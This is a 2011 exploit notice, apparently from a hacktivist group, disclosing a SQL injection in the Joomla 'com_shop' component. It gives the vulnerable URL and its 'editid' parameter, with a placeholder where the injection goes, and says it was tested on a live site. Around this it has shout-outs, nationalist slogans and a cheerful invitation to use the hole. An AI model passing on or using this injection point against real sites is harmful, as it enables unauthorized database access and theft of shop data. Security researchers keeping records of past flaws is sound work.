The Joomla Shop component suffers from a remote SQL injection vulnerability.
5c1c7436095eb4f29d0aa7816ab894e560cc003e2fd802174240f3410ba875fc
#########################################################################
[+] Exploit Title :Joomla Component (com_shop) SQL Injection Vulnerability
[~] Author : ThunDEr HeaD
[~] Contact : thunderhead10@gmail.com
[~] Date : 24-05-2011
[~] HomePage : www.indishell.in
[~] Version :
[~] Tested on : Live SIte
[~] Vulnerability Style : Joomla Component SQLi
[~] Vendor: http://www.mudrait.com/
#########################################################################
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
<3 Love: -[SiLeNtp0is0n]-, stRaNgEr(lucky), inX_rOot, NEO H4cK3R, DarkL00k, Th3 RDX, G00g!3 W@rr!0r, Mahi ,
eXeSoul, str1k3r, co0Lt04d , ATUL DWIVEDI , Jackh4xor
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
......\m/ INDIAN CYBER ARMY \m/......
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Vulnerability:
*SQL injection Vulnerability*
[#] http://site/index.php?option=com_shop&task=viewproduct&editid=-38
[#] http://site/index.php?option=com_shop&task=viewproduct&editid=[SQLi]
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=> PROUD TO BE AN INDIAN | Anythning for INDIA | JAI-HIND | Maa Tujhe Salam
=> c0d3 for motherland, h4ck for motherland
Enj0y! :D
[#] DOne now time to rock \m/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Bug discovered : 24 May 2011
finish(0);
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
#End 0Day#